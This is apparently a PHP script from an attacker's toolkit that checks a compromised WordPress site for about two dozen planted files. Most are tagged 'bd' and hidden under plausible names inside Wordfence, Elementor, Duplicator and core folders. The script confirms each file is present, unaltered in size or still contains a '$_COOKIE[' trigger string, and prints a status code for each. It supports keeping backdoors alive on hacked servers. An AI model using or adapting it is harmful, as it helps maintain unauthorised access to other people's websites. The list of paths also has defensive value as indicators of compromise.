<?php $r = '/var/www/2of3'; $x = ["/wp-includes/class-walker-page-dropdown.php"=>"bd@@7680@@$_COOKIE[4",
"/wp-content/plugins/duplicator/assets/css/font-awesome/webfonts/quick_reply.php"=>"bd@@6400@@2224",
"/wp-content/plugins/thifehwy/freemius/assets/css/admin/module.functions.php"=>"bd@@6402@@418",
"/wp-content/themes/oceanwp/inc/themepanel/views/panes/install-demos.php"=>"bd@@7685@@33",
"/wp-includes/admin-bar.php"=>"bd@@7692@@$_COOKIE[7",
"/wp-includes/sitemaps/class-wp-sitemaps-renderer.php"=>"bd@@7698@@86",
"/wp-includes/blocks/latest-posts.php"=>"bd@@7705@@_COOKIE[3]",
"/wp-includes/rest-api/endpoints/class-wp-rest-menu-locations-controller.php"=>"bd@@7709@@12",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/UnitConverter.php"=>"bd@@7712@@448",
"/wp-content/plugins/ocean-extra/includes/menu-icons/includes/library/icon-selector/includes/fields/wish_list.php"=>"bd@@7715@@372",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/_con_aaa_DS.php"=>"bd@@7717@@2328",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/php-di/src/Compiler/t.php"=>"bd@@7718@@1034",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/laravel/serializable-closure/src/Contracts/cil.php"=>"bd@@7720@@1015",
"/wp-includes/sodium_compat/src/Core32/XSalsa20.php"=>"bd@@3635@@_COOKIE[3]",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/mod_latestnews.php"=>"bd@@3706@@534",
"/wp-content/plugins/duplicator/vendor/requests/library/Requests/Exception/Transport/adodb.config.php"=>"bd@@3752@@1040",
"/wp-content/plugins/elementor/app/modules/import-export/runners/import/import.settings.php"=>"bd@@3760@@1634",
"/wp-content/plugins/elementor/modules/atomic-widgets/props-resolver/transformers/styles/background.transformer.php"=>"bd@@3771@@1813",
"/wp-includes/class-wp-tax-query.php"=>"bd@@3538@@framework",
"/wp-content/plugins/nobj405n/freemius/templates/forms/deactivation/retry.php"=>"bd@@3795@@1622",
"/wp-content/themes/archives-1747140322/connents.php"=>"bd@@3309@@1105",
"/wp-content/plugins/elementor/modules/atomic-widgets/elements/atomic-paragraph/atomic.paragraph.php"=>"bd@@6397@@1802",
"/wp-content/plugins/elementor/modules/atomic-widgets/elements/atomic-image/atomic.image.php"=>"bd@@6398@@534",
"/wp-content/plugins/duplicator/template/admin_pages/about_us/about_us/extra.php"=>"bd@@6399@@624",
"/wp-content/plugins/ocean-extra/includes/themepanel/includes/libs/vendor/enshrined/svg-sanitize/src/ElementReference/phone.php"=>"ui@@92@@6886",
"/wp-includes/widgets/class-wp-widget-search.php"=>"ui@@92@@phone.php"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!'); |